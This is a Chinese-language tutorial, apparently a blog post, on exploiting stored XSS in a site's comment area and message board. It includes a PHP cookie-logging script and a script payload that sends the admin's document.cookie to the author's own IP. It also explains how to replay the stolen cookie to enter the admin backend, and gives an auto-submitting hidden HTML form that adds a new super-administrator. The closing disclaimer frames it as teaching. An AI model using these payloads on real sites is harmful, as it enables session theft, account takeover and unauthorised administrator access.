一、寻找xss漏洞
一般想获取最高权限,就要找存储型xss漏洞,这样的漏洞是服务器和浏览器进行数据交换的,有利于数据写入进去。一般留言板、评论区可能性最大。
1、评论区 <script>alert(1111)</script>
弹出1111,证明咱们找到评论区xss的漏洞了。并且代码也执行了。
2、留言板 aaaaa<script>alert(222)</script>
由于这个留言需要管理员审查,我们去后台看一下,有没有弹窗。
证明咱们留言板的xss漏洞也找到了。并且代码执行了。
二、利用漏洞
通过上述操作,我们会发现,评论区管理员不需要做什么,就可以简单的发上去,但是留言板需要管理员审查才可以发表上去。我们可以利用xss漏洞获取管理员权限,为了可以获取管理员权限,这次需要管理员配合我们获取(比如点击我们写的留言,查看我们留言什么的),总之为了获取管理权限,不能少了管理员。
1、我们需要获取管理员的账号和密码,但是这个除了sql注入,目前还没什么更快的办法获取到。这样我们就要思维活跃一点不能让思维困住我们,之前学过cookie和SESSID,这俩个是存储密码用的(不懂的童鞋,看我之前的博客学习一下,这里不讲)为了我们能获取到管理员的cookie。我们需要用php写一段代码:
<?php
$referer = $_SERVER['HTTP_REFERER'];//超级全局变量(告诉服务器从哪来的)获取前一个页面的url地址。
$cookie = $_GET['cookie'];//获取cookie值
$time= date ("y-m-d G-i-s A");//添加时间戳
$file = fopen('abs.txt','a+');//创建文本名字是abs.txt,权限是a+(可读写模式)
fwrite($file,"cookie:".$cookie."/n referer:".$referer."/n time:".$time);//写入文件括号里的是想要的值
fclose($file);//关闭文件
?>
2、下面就需要把这句话添加到留言板里具体代码如下:
aaa<script>window.location.href="http://10.10.87.228/qwer/test.php?cookie="+document.cookie</script>//执行获取管理员cookie的语句
这里的ip地址是自己的电脑的地址,为了是获取完cookie传回本地电脑。
注:并且这个网页是可以访问的啊,要不然接受不到cookie。
注:用网页直接访问是不显示任何东西的。
写在留言板里
然后在本地目录就会生成一个abs.txt的文件。
这样我们就轻易的获取到管理员的cookie了,我们用大神写好的软件进一下管理的后台。
地址就填网站的管理员地址,再把提交方式改成GET,然后吧咱们获取的cookie填到里面。这样我们就不要任何的账号密码就顺利的进去后台管理页面了。
三、利用xss漏洞添加一个超级管理员
1.我们通过burp抓包,发现添加管理员页面发现这些变量。
2.一个是网页提交地址,一个是提交变量的名字。这样我们就可以自己写一个html网页把这些变量重新按我们想要的结果编写。代码如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<form action="http://10.10.87.172/qzm/admin.php?c=a_adminuser&a=add&run=1" method="post" name="form1">
//一个form表单,跳转地址是服务器地址,提交方式是post。
<input type="hidden" name="auser" value="qqq">//添加的用户名是qqq
<input type="hidden" name="apass" value="qqq">//添加的用户密码是qqq
<input type="hidden" name="gid" value="1">//添加的我用户组是1
<input type="hidden" name="level" value="1">//添加的用户权限是1
<button type="submit" name="ok">123456</button>//提交按钮
</form>
<script>
document.form1.submit();//执行提交动作
</script>
</body>
</html>
3.继续利用刚才的留言板漏洞插入js代码
qzm//执行添加管理员语句
注:代码同样是可以执行的
注:执行过程比较快
成功添加管理员qqq
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。